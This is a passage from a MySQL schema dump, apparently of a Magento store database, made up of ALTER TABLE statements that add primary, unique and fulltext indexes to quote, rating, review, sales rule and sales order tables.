  ADD KEY `QUOTE_CUSTOMER_ID_STORE_ID_IS_ACTIVE` (`customer_id`,`store_id`,`is_active`),
  ADD KEY `QUOTE_STORE_ID` (`store_id`);

--
-- Indexes for table `quote_address`
--
ALTER TABLE `quote_address`
  ADD PRIMARY KEY (`address_id`),
  ADD KEY `QUOTE_ADDRESS_QUOTE_ID` (`quote_id`);

--
-- Indexes for table `quote_address_item`
--
ALTER TABLE `quote_address_item`
  ADD PRIMARY KEY (`address_item_id`),
  ADD KEY `QUOTE_ADDRESS_ITEM_QUOTE_ADDRESS_ID` (`quote_address_id`),
  ADD KEY `QUOTE_ADDRESS_ITEM_PARENT_ITEM_ID` (`parent_item_id`),
  ADD KEY `QUOTE_ADDRESS_ITEM_QUOTE_ITEM_ID` (`quote_item_id`),
  ADD KEY `QUOTE_ADDRESS_ITEM_STORE_ID` (`store_id`);

--
-- Indexes for table `quote_id_mask`
--
ALTER TABLE `quote_id_mask`
  ADD PRIMARY KEY (`entity_id`,`quote_id`),
  ADD KEY `QUOTE_ID_MASK_QUOTE_ID` (`quote_id`),
  ADD KEY `QUOTE_ID_MASK_MASKED_ID` (`masked_id`);

--
-- Indexes for table `quote_item`
--
ALTER TABLE `quote_item`
  ADD PRIMARY KEY (`item_id`),
  ADD KEY `QUOTE_ITEM_PARENT_ITEM_ID` (`parent_item_id`),
  ADD KEY `QUOTE_ITEM_PRODUCT_ID` (`product_id`),
  ADD KEY `QUOTE_ITEM_QUOTE_ID` (`quote_id`),
  ADD KEY `QUOTE_ITEM_STORE_ID` (`store_id`);

--
-- Indexes for table `quote_item_option`
--
ALTER TABLE `quote_item_option`
  ADD PRIMARY KEY (`option_id`),
  ADD KEY `QUOTE_ITEM_OPTION_ITEM_ID` (`item_id`);

--
-- Indexes for table `quote_payment`
--
ALTER TABLE `quote_payment`
  ADD PRIMARY KEY (`payment_id`),
  ADD KEY `QUOTE_PAYMENT_QUOTE_ID` (`quote_id`);

--
-- Indexes for table `quote_shipping_rate`
--
ALTER TABLE `quote_shipping_rate`
  ADD PRIMARY KEY (`rate_id`),
  ADD KEY `QUOTE_SHIPPING_RATE_ADDRESS_ID` (`address_id`);

--
-- Indexes for table `rating`
--
ALTER TABLE `rating`
  ADD PRIMARY KEY (`rating_id`),
  ADD UNIQUE KEY `RATING_RATING_CODE` (`rating_code`),
  ADD KEY `RATING_ENTITY_ID` (`entity_id`);

--
-- Indexes for table `rating_entity`
--
ALTER TABLE `rating_entity`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `RATING_ENTITY_ENTITY_CODE` (`entity_code`);

--
-- Indexes for table `rating_option`
--
ALTER TABLE `rating_option`
  ADD PRIMARY KEY (`option_id`),
  ADD KEY `RATING_OPTION_RATING_ID` (`rating_id`);

--
-- Indexes for table `rating_option_vote`
--
ALTER TABLE `rating_option_vote`
  ADD PRIMARY KEY (`vote_id`),
  ADD KEY `RATING_OPTION_VOTE_REVIEW_ID_REVIEW_REVIEW_ID` (`review_id`),
  ADD KEY `RATING_OPTION_VOTE_OPTION_ID` (`option_id`);

--
-- Indexes for table `rating_option_vote_aggregated`
--
ALTER TABLE `rating_option_vote_aggregated`
  ADD PRIMARY KEY (`primary_id`),
  ADD KEY `RATING_OPTION_VOTE_AGGREGATED_RATING_ID` (`rating_id`),
  ADD KEY `RATING_OPTION_VOTE_AGGREGATED_STORE_ID` (`store_id`);

--
-- Indexes for table `rating_store`
--
ALTER TABLE `rating_store`
  ADD PRIMARY KEY (`rating_id`,`store_id`),
  ADD KEY `RATING_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `rating_title`
--
ALTER TABLE `rating_title`
  ADD PRIMARY KEY (`rating_id`,`store_id`),
  ADD KEY `RATING_TITLE_STORE_ID` (`store_id`);

--
-- Indexes for table `release_notification_viewer_log`
--
ALTER TABLE `release_notification_viewer_log`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `RELEASE_NOTIFICATION_VIEWER_LOG_VIEWER_ID` (`viewer_id`);

--
-- Indexes for table `reporting_counts`
--
ALTER TABLE `reporting_counts`
  ADD PRIMARY KEY (`entity_id`);

--
-- Indexes for table `reporting_module_status`
--
ALTER TABLE `reporting_module_status`
  ADD PRIMARY KEY (`entity_id`);

--
-- Indexes for table `reporting_orders`
--
ALTER TABLE `reporting_orders`
  ADD PRIMARY KEY (`entity_id`);

--
-- Indexes for table `reporting_system_updates`
--
ALTER TABLE `reporting_system_updates`
  ADD PRIMARY KEY (`entity_id`);

--
-- Indexes for table `reporting_users`
--
ALTER TABLE `reporting_users`
  ADD PRIMARY KEY (`entity_id`);

--
-- Indexes for table `report_compared_product_index`
--
ALTER TABLE `report_compared_product_index`
  ADD PRIMARY KEY (`index_id`),
  ADD UNIQUE KEY `REPORT_COMPARED_PRODUCT_INDEX_VISITOR_ID_PRODUCT_ID` (`visitor_id`,`product_id`),
  ADD UNIQUE KEY `REPORT_COMPARED_PRODUCT_INDEX_CUSTOMER_ID_PRODUCT_ID` (`customer_id`,`product_id`),
  ADD KEY `REPORT_COMPARED_PRODUCT_INDEX_STORE_ID` (`store_id`),
  ADD KEY `REPORT_COMPARED_PRODUCT_INDEX_ADDED_AT` (`added_at`),
  ADD KEY `REPORT_COMPARED_PRODUCT_INDEX_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `report_event`
--
ALTER TABLE `report_event`
  ADD PRIMARY KEY (`event_id`),
  ADD KEY `REPORT_EVENT_EVENT_TYPE_ID` (`event_type_id`),
  ADD KEY `REPORT_EVENT_SUBJECT_ID` (`subject_id`),
  ADD KEY `REPORT_EVENT_OBJECT_ID` (`object_id`),
  ADD KEY `REPORT_EVENT_SUBTYPE` (`subtype`),
  ADD KEY `REPORT_EVENT_STORE_ID` (`store_id`);

--
-- Indexes for table `report_event_types`
--
ALTER TABLE `report_event_types`
  ADD PRIMARY KEY (`event_type_id`);

--
-- Indexes for table `report_viewed_product_aggregated_daily`
--
ALTER TABLE `report_viewed_product_aggregated_daily`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `REPORT_VIEWED_PRD_AGGRED_DAILY_PERIOD_STORE_ID_PRD_ID` (`period`,`store_id`,`product_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_AGGREGATED_DAILY_STORE_ID` (`store_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_AGGREGATED_DAILY_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `report_viewed_product_aggregated_monthly`
--
ALTER TABLE `report_viewed_product_aggregated_monthly`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `REPORT_VIEWED_PRD_AGGRED_MONTHLY_PERIOD_STORE_ID_PRD_ID` (`period`,`store_id`,`product_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_AGGREGATED_MONTHLY_STORE_ID` (`store_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_AGGREGATED_MONTHLY_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `report_viewed_product_aggregated_yearly`
--
ALTER TABLE `report_viewed_product_aggregated_yearly`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `REPORT_VIEWED_PRD_AGGRED_YEARLY_PERIOD_STORE_ID_PRD_ID` (`period`,`store_id`,`product_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_AGGREGATED_YEARLY_STORE_ID` (`store_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_AGGREGATED_YEARLY_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `report_viewed_product_index`
--
ALTER TABLE `report_viewed_product_index`
  ADD PRIMARY KEY (`index_id`),
  ADD UNIQUE KEY `REPORT_VIEWED_PRODUCT_INDEX_VISITOR_ID_PRODUCT_ID` (`visitor_id`,`product_id`),
  ADD UNIQUE KEY `REPORT_VIEWED_PRODUCT_INDEX_CUSTOMER_ID_PRODUCT_ID` (`customer_id`,`product_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_INDEX_STORE_ID` (`store_id`),
  ADD KEY `REPORT_VIEWED_PRODUCT_INDEX_ADDED_AT` (`added_at`),
  ADD KEY `REPORT_VIEWED_PRODUCT_INDEX_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `review`
--
ALTER TABLE `review`
  ADD PRIMARY KEY (`review_id`),
  ADD KEY `REVIEW_ENTITY_ID` (`entity_id`),
  ADD KEY `REVIEW_STATUS_ID` (`status_id`),
  ADD KEY `REVIEW_ENTITY_PK_VALUE` (`entity_pk_value`);

--
-- Indexes for table `review_detail`
--
ALTER TABLE `review_detail`
  ADD PRIMARY KEY (`detail_id`),
  ADD KEY `REVIEW_DETAIL_REVIEW_ID` (`review_id`),
  ADD KEY `REVIEW_DETAIL_STORE_ID` (`store_id`),
  ADD KEY `REVIEW_DETAIL_CUSTOMER_ID` (`customer_id`);

--
-- Indexes for table `review_entity`
--
ALTER TABLE `review_entity`
  ADD PRIMARY KEY (`entity_id`);

--
-- Indexes for table `review_entity_summary`
--
ALTER TABLE `review_entity_summary`
  ADD PRIMARY KEY (`primary_id`),
  ADD KEY `REVIEW_ENTITY_SUMMARY_STORE_ID` (`store_id`);

--
-- Indexes for table `review_status`
--
ALTER TABLE `review_status`
  ADD PRIMARY KEY (`status_id`);

--
-- Indexes for table `review_store`
--
ALTER TABLE `review_store`
  ADD PRIMARY KEY (`review_id`,`store_id`),
  ADD KEY `REVIEW_STORE_STORE_ID` (`store_id`);

--
-- Indexes for table `salesrule`
--
ALTER TABLE `salesrule`
  ADD PRIMARY KEY (`rule_id`),
  ADD KEY `SALESRULE_IS_ACTIVE_SORT_ORDER_TO_DATE_FROM_DATE` (`is_active`,`sort_order`,`to_date`,`from_date`);

--
-- Indexes for table `salesrule_coupon`
--
ALTER TABLE `salesrule_coupon`
  ADD PRIMARY KEY (`coupon_id`),
  ADD UNIQUE KEY `SALESRULE_COUPON_CODE` (`code`),
  ADD UNIQUE KEY `SALESRULE_COUPON_RULE_ID_IS_PRIMARY` (`rule_id`,`is_primary`),
  ADD KEY `SALESRULE_COUPON_RULE_ID` (`rule_id`);

--
-- Indexes for table `salesrule_coupon_aggregated`
--
ALTER TABLE `salesrule_coupon_aggregated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALESRULE_COUPON_AGGRED_PERIOD_STORE_ID_ORDER_STS_COUPON_CODE` (`period`,`store_id`,`order_status`,`coupon_code`),
  ADD KEY `SALESRULE_COUPON_AGGREGATED_STORE_ID` (`store_id`),
  ADD KEY `SALESRULE_COUPON_AGGREGATED_RULE_NAME` (`rule_name`);

--
-- Indexes for table `salesrule_coupon_aggregated_order`
--
ALTER TABLE `salesrule_coupon_aggregated_order`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `UNQ_1094D1FBBCBB11704A29DEF3ACC37D2B` (`period`,`store_id`,`order_status`,`coupon_code`),
  ADD KEY `SALESRULE_COUPON_AGGREGATED_ORDER_STORE_ID` (`store_id`),
  ADD KEY `SALESRULE_COUPON_AGGREGATED_ORDER_RULE_NAME` (`rule_name`);

--
-- Indexes for table `salesrule_coupon_aggregated_updated`
--
ALTER TABLE `salesrule_coupon_aggregated_updated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `UNQ_7196FA120A4F0F84E1B66605E87E213E` (`period`,`store_id`,`order_status`,`coupon_code`),
  ADD KEY `SALESRULE_COUPON_AGGREGATED_UPDATED_STORE_ID` (`store_id`),
  ADD KEY `SALESRULE_COUPON_AGGREGATED_UPDATED_RULE_NAME` (`rule_name`);

--
-- Indexes for table `salesrule_coupon_usage`
--
ALTER TABLE `salesrule_coupon_usage`
  ADD PRIMARY KEY (`coupon_id`,`customer_id`),
  ADD KEY `SALESRULE_COUPON_USAGE_CUSTOMER_ID` (`customer_id`);

--
-- Indexes for table `salesrule_customer`
--
ALTER TABLE `salesrule_customer`
  ADD PRIMARY KEY (`rule_customer_id`),
  ADD KEY `SALESRULE_CUSTOMER_RULE_ID_CUSTOMER_ID` (`rule_id`,`customer_id`),
  ADD KEY `SALESRULE_CUSTOMER_CUSTOMER_ID_RULE_ID` (`customer_id`,`rule_id`);

--
-- Indexes for table `salesrule_customer_group`
--
ALTER TABLE `salesrule_customer_group`
  ADD PRIMARY KEY (`rule_id`,`customer_group_id`),
  ADD KEY `SALESRULE_CUSTOMER_GROUP_CUSTOMER_GROUP_ID` (`customer_group_id`);

--
-- Indexes for table `salesrule_label`
--
ALTER TABLE `salesrule_label`
  ADD PRIMARY KEY (`label_id`),
  ADD UNIQUE KEY `SALESRULE_LABEL_RULE_ID_STORE_ID` (`rule_id`,`store_id`),
  ADD KEY `SALESRULE_LABEL_STORE_ID` (`store_id`);

--
-- Indexes for table `salesrule_product_attribute`
--
ALTER TABLE `salesrule_product_attribute`
  ADD PRIMARY KEY (`rule_id`,`website_id`,`customer_group_id`,`attribute_id`),
  ADD KEY `SALESRULE_PRODUCT_ATTRIBUTE_WEBSITE_ID` (`website_id`),
  ADD KEY `SALESRULE_PRODUCT_ATTRIBUTE_CUSTOMER_GROUP_ID` (`customer_group_id`),
  ADD KEY `SALESRULE_PRODUCT_ATTRIBUTE_ATTRIBUTE_ID` (`attribute_id`);

--
-- Indexes for table `salesrule_website`
--
ALTER TABLE `salesrule_website`
  ADD PRIMARY KEY (`rule_id`,`website_id`),
  ADD KEY `SALESRULE_WEBSITE_WEBSITE_ID` (`website_id`);

--
-- Indexes for table `sales_bestsellers_aggregated_daily`
--
ALTER TABLE `sales_bestsellers_aggregated_daily`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_BESTSELLERS_AGGREGATED_DAILY_PERIOD_STORE_ID_PRODUCT_ID` (`period`,`store_id`,`product_id`),
  ADD KEY `SALES_BESTSELLERS_AGGREGATED_DAILY_STORE_ID` (`store_id`),
  ADD KEY `SALES_BESTSELLERS_AGGREGATED_DAILY_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `sales_bestsellers_aggregated_monthly`
--
ALTER TABLE `sales_bestsellers_aggregated_monthly`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_BESTSELLERS_AGGREGATED_MONTHLY_PERIOD_STORE_ID_PRODUCT_ID` (`period`,`store_id`,`product_id`),
  ADD KEY `SALES_BESTSELLERS_AGGREGATED_MONTHLY_STORE_ID` (`store_id`),
  ADD KEY `SALES_BESTSELLERS_AGGREGATED_MONTHLY_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `sales_bestsellers_aggregated_yearly`
--
ALTER TABLE `sales_bestsellers_aggregated_yearly`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_BESTSELLERS_AGGREGATED_YEARLY_PERIOD_STORE_ID_PRODUCT_ID` (`period`,`store_id`,`product_id`),
  ADD KEY `SALES_BESTSELLERS_AGGREGATED_YEARLY_STORE_ID` (`store_id`),
  ADD KEY `SALES_BESTSELLERS_AGGREGATED_YEARLY_PRODUCT_ID` (`product_id`);

--
-- Indexes for table `sales_creditmemo`
--
ALTER TABLE `sales_creditmemo`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_CREDITMEMO_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_CREDITMEMO_STORE_ID` (`store_id`),
  ADD KEY `SALES_CREDITMEMO_ORDER_ID` (`order_id`),
  ADD KEY `SALES_CREDITMEMO_CREDITMEMO_STATUS` (`creditmemo_status`),
  ADD KEY `SALES_CREDITMEMO_STATE` (`state`),
  ADD KEY `SALES_CREDITMEMO_CREATED_AT` (`created_at`),
  ADD KEY `SALES_CREDITMEMO_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_CREDITMEMO_SEND_EMAIL` (`send_email`),
  ADD KEY `SALES_CREDITMEMO_EMAIL_SENT` (`email_sent`);

--
-- Indexes for table `sales_creditmemo_comment`
--
ALTER TABLE `sales_creditmemo_comment`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_CREDITMEMO_COMMENT_CREATED_AT` (`created_at`),
  ADD KEY `SALES_CREDITMEMO_COMMENT_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_creditmemo_grid`
--
ALTER TABLE `sales_creditmemo_grid`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_CREDITMEMO_GRID_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_CREDITMEMO_GRID_ORDER_INCREMENT_ID` (`order_increment_id`),
  ADD KEY `SALES_CREDITMEMO_GRID_CREATED_AT` (`created_at`),
  ADD KEY `SALES_CREDITMEMO_GRID_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_CREDITMEMO_GRID_ORDER_CREATED_AT` (`order_created_at`),
  ADD KEY `SALES_CREDITMEMO_GRID_STATE` (`state`),
  ADD KEY `SALES_CREDITMEMO_GRID_BILLING_NAME` (`billing_name`),
  ADD KEY `SALES_CREDITMEMO_GRID_ORDER_STATUS` (`order_status`),
  ADD KEY `SALES_CREDITMEMO_GRID_BASE_GRAND_TOTAL` (`base_grand_total`),
  ADD KEY `SALES_CREDITMEMO_GRID_STORE_ID` (`store_id`),
  ADD KEY `SALES_CREDITMEMO_GRID_ORDER_BASE_GRAND_TOTAL` (`order_base_grand_total`),
  ADD KEY `SALES_CREDITMEMO_GRID_ORDER_ID` (`order_id`);
ALTER TABLE `sales_creditmemo_grid` ADD FULLTEXT KEY `FTI_32B7BA885941A8254EE84AE650ABDC86` (`increment_id`,`order_increment_id`,`billing_name`,`billing_address`,`shipping_address`,`customer_name`,`customer_email`);

--
-- Indexes for table `sales_creditmemo_item`
--
ALTER TABLE `sales_creditmemo_item`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_CREDITMEMO_ITEM_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_invoice`
--
ALTER TABLE `sales_invoice`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_INVOICE_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_INVOICE_STORE_ID` (`store_id`),
  ADD KEY `SALES_INVOICE_GRAND_TOTAL` (`grand_total`),
  ADD KEY `SALES_INVOICE_ORDER_ID` (`order_id`),
  ADD KEY `SALES_INVOICE_STATE` (`state`),
  ADD KEY `SALES_INVOICE_CREATED_AT` (`created_at`),
  ADD KEY `SALES_INVOICE_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_INVOICE_SEND_EMAIL` (`send_email`),
  ADD KEY `SALES_INVOICE_EMAIL_SENT` (`email_sent`);

--
-- Indexes for table `sales_invoiced_aggregated`
--
ALTER TABLE `sales_invoiced_aggregated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_INVOICED_AGGREGATED_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  ADD KEY `SALES_INVOICED_AGGREGATED_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_invoiced_aggregated_order`
--
ALTER TABLE `sales_invoiced_aggregated_order`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_INVOICED_AGGREGATED_ORDER_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  ADD KEY `SALES_INVOICED_AGGREGATED_ORDER_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_invoice_comment`
--
ALTER TABLE `sales_invoice_comment`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_INVOICE_COMMENT_CREATED_AT` (`created_at`),
  ADD KEY `SALES_INVOICE_COMMENT_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_invoice_grid`
--
ALTER TABLE `sales_invoice_grid`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_INVOICE_GRID_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_INVOICE_GRID_STORE_ID` (`store_id`),
  ADD KEY `SALES_INVOICE_GRID_GRAND_TOTAL` (`grand_total`),
  ADD KEY `SALES_INVOICE_GRID_ORDER_ID` (`order_id`),
  ADD KEY `SALES_INVOICE_GRID_STATE` (`state`),
  ADD KEY `SALES_INVOICE_GRID_ORDER_INCREMENT_ID` (`order_increment_id`),
  ADD KEY `SALES_INVOICE_GRID_CREATED_AT` (`created_at`),
  ADD KEY `SALES_INVOICE_GRID_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_INVOICE_GRID_ORDER_CREATED_AT` (`order_created_at`),
  ADD KEY `SALES_INVOICE_GRID_BILLING_NAME` (`billing_name`),
  ADD KEY `SALES_INVOICE_GRID_BASE_GRAND_TOTAL` (`base_grand_total`);
ALTER TABLE `sales_invoice_grid` ADD FULLTEXT KEY `FTI_95D9C924DD6A8734EB8B5D01D60F90DE` (`increment_id`,`order_increment_id`,`billing_name`,`billing_address`,`shipping_address`,`customer_name`,`customer_email`);

--
-- Indexes for table `sales_invoice_item`
--
ALTER TABLE `sales_invoice_item`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_INVOICE_ITEM_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_order`
--
ALTER TABLE `sales_order`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_ORDER_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_ORDER_STATUS` (`status`),
  ADD KEY `SALES_ORDER_STATE` (`state`),
  ADD KEY `SALES_ORDER_STORE_ID` (`store_id`),
  ADD KEY `SALES_ORDER_CREATED_AT` (`created_at`),
  ADD KEY `SALES_ORDER_CUSTOMER_ID` (`customer_id`),
  ADD KEY `SALES_ORDER_EXT_ORDER_ID` (`ext_order_id`),
  ADD KEY `SALES_ORDER_QUOTE_ID` (`quote_id`),
  ADD KEY `SALES_ORDER_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_ORDER_SEND_EMAIL` (`send_email`),
  ADD KEY `SALES_ORDER_EMAIL_SENT` (`email_sent`);

--
-- Indexes for table `sales_order_address`
--
ALTER TABLE `sales_order_address`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_ORDER_ADDRESS_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_order_aggregated_created`
--
ALTER TABLE `sales_order_aggregated_created`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_ORDER_AGGREGATED_CREATED_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  ADD KEY `SALES_ORDER_AGGREGATED_CREATED_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_order_aggregated_updated`
--
ALTER TABLE `sales_order_aggregated_updated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_ORDER_AGGREGATED_UPDATED_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  ADD KEY `SALES_ORDER_AGGREGATED_UPDATED_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_order_grid`
--
ALTER TABLE `sales_order_grid`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_ORDER_GRID_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_ORDER_GRID_STATUS` (`status`),
  ADD KEY `SALES_ORDER_GRID_STORE_ID` (`store_id`),
  ADD KEY `SALES_ORDER_GRID_BASE_GRAND_TOTAL` (`base_grand_total`),
  ADD KEY `SALES_ORDER_GRID_BASE_TOTAL_PAID` (`base_total_paid`),
  ADD KEY `SALES_ORDER_GRID_GRAND_TOTAL` (`grand_total`),
  ADD KEY `SALES_ORDER_GRID_TOTAL_PAID` (`total_paid`),
  ADD KEY `SALES_ORDER_GRID_SHIPPING_NAME` (`shipping_name`),
  ADD KEY `SALES_ORDER_GRID_BILLING_NAME` (`billing_name`),
  ADD KEY `SALES_ORDER_GRID_CREATED_AT` (`created_at`),
  ADD KEY `SALES_ORDER_GRID_CUSTOMER_ID` (`customer_id`),
  ADD KEY `SALES_ORDER_GRID_UPDATED_AT` (`updated_at`);
ALTER TABLE `sales_order_grid` ADD FULLTEXT KEY `FTI_65B9E9925EC58F0C7C2E2F6379C233E7` (`increment_id`,`billing_name`,`shipping_name`,`shipping_address`,`billing_address`,`customer_name`,`customer_email`);

--
-- Indexes for table `sales_order_item`
--
ALTER TABLE `sales_order_item`
  ADD PRIMARY KEY (`item_id`),
  ADD KEY `SALES_ORDER_ITEM_ORDER_ID` (`order_id`),
  ADD KEY `SALES_ORDER_ITEM_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_order_payment`
--
ALTER TABLE `sales_order_payment`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_ORDER_PAYMENT_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_order_status`
--
ALTER TABLE `sales_order_status`
  ADD PRIMARY KEY (`status`);

--
-- Indexes for table `sales_order_status_history`
--
ALTER TABLE `sales_order_status_history`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_ORDER_STATUS_HISTORY_PARENT_ID` (`parent_id`),
  ADD KEY `SALES_ORDER_STATUS_HISTORY_CREATED_AT` (`created_at`);

--
-- Indexes for table `sales_order_status_label`
--
ALTER TABLE `sales_order_status_label`
  ADD PRIMARY KEY (`status`,`store_id`),
  ADD KEY `SALES_ORDER_STATUS_LABEL_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_order_status_state`
--
ALTER TABLE `sales_order_status_state`
  ADD PRIMARY KEY (`status`,`state`);

--
-- Indexes for table `sales_order_tax`
--
ALTER TABLE `sales_order_tax`
  ADD PRIMARY KEY (`tax_id`),
  ADD KEY `SALES_ORDER_TAX_ORDER_ID_PRIORITY_POSITION` (`order_id`,`priority`,`position`);

--
-- Indexes for table `sales_order_tax_item`
--
ALTER TABLE `sales_order_tax_item`
  ADD PRIMARY KEY (`tax_item_id`),
  ADD UNIQUE KEY `SALES_ORDER_TAX_ITEM_TAX_ID_ITEM_ID` (`tax_id`,`item_id`),
  ADD KEY `SALES_ORDER_TAX_ITEM_ASSOCIATED_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` (`associated_item_id`),
  ADD KEY `SALES_ORDER_TAX_ITEM_ITEM_ID` (`item_id`);

--
-- Indexes for table `sales_payment_transaction`
--
ALTER TABLE `sales_payment_transaction`
  ADD PRIMARY KEY (`transaction_id`),
  ADD UNIQUE KEY `SALES_PAYMENT_TRANSACTION_ORDER_ID_PAYMENT_ID_TXN_ID` (`order_id`,`payment_id`,`txn_id`),
  ADD KEY `SALES_PAYMENT_TRANSACTION_PARENT_ID` (`parent_id`),
  ADD KEY `SALES_PAYMENT_TRANSACTION_PAYMENT_ID` (`payment_id`);

--
-- Indexes for table `sales_refunded_aggregated`
--
ALTER TABLE `sales_refunded_aggregated`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_REFUNDED_AGGREGATED_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  ADD KEY `SALES_REFUNDED_AGGREGATED_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_refunded_aggregated_order`
--
ALTER TABLE `sales_refunded_aggregated_order`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `SALES_REFUNDED_AGGREGATED_ORDER_PERIOD_STORE_ID_ORDER_STATUS` (`period`,`store_id`,`order_status`),
  ADD KEY `SALES_REFUNDED_AGGREGATED_ORDER_STORE_ID` (`store_id`);

--
-- Indexes for table `sales_sequence_meta`
--
ALTER TABLE `sales_sequence_meta`
  ADD PRIMARY KEY (`meta_id`),
  ADD UNIQUE KEY `SALES_SEQUENCE_META_ENTITY_TYPE_STORE_ID` (`entity_type`,`store_id`);

--
-- Indexes for table `sales_sequence_profile`
--
ALTER TABLE `sales_sequence_profile`
  ADD PRIMARY KEY (`profile_id`),
  ADD UNIQUE KEY `SALES_SEQUENCE_PROFILE_META_ID_PREFIX_SUFFIX` (`meta_id`,`prefix`,`suffix`);

--
-- Indexes for table `sales_shipment`
--
ALTER TABLE `sales_shipment`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_SHIPMENT_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_SHIPMENT_STORE_ID` (`store_id`),
  ADD KEY `SALES_SHIPMENT_TOTAL_QTY` (`total_qty`),
  ADD KEY `SALES_SHIPMENT_ORDER_ID` (`order_id`),
  ADD KEY `SALES_SHIPMENT_CREATED_AT` (`created_at`),
  ADD KEY `SALES_SHIPMENT_UPDATED_AT` (`updated_at`),
  ADD KEY `SALES_SHIPMENT_SEND_EMAIL` (`send_email`),
  ADD KEY `SALES_SHIPMENT_EMAIL_SENT` (`email_sent`);

--
-- Indexes for table `sales_shipment_comment`
--
ALTER TABLE `sales_shipment_comment`
  ADD PRIMARY KEY (`entity_id`),
  ADD KEY `SALES_SHIPMENT_COMMENT_CREATED_AT` (`created_at`),
  ADD KEY `SALES_SHIPMENT_COMMENT_PARENT_ID` (`parent_id`);

--
-- Indexes for table `sales_shipment_grid`
--
ALTER TABLE `sales_shipment_grid`
  ADD PRIMARY KEY (`entity_id`),
  ADD UNIQUE KEY `SALES_SHIPMENT_GRID_INCREMENT_ID_STORE_ID` (`increment_id`,`store_id`),
  ADD KEY `SALES_SHIPMENT_GRID_STORE_ID` (`store_id`),
  ADD KEY `SALES_SHIPMENT_GRID_TOTAL_QTY` (`total_qty`),
  ADD KEY `SALES_SHIPMENT_GRID_ORDER_INCREMENT_ID` (`order_increment_id`),
  ADD KEY `SALES_SHIPMENT_GRID_SHIPMENT_STATUS` (`shipment_status`),
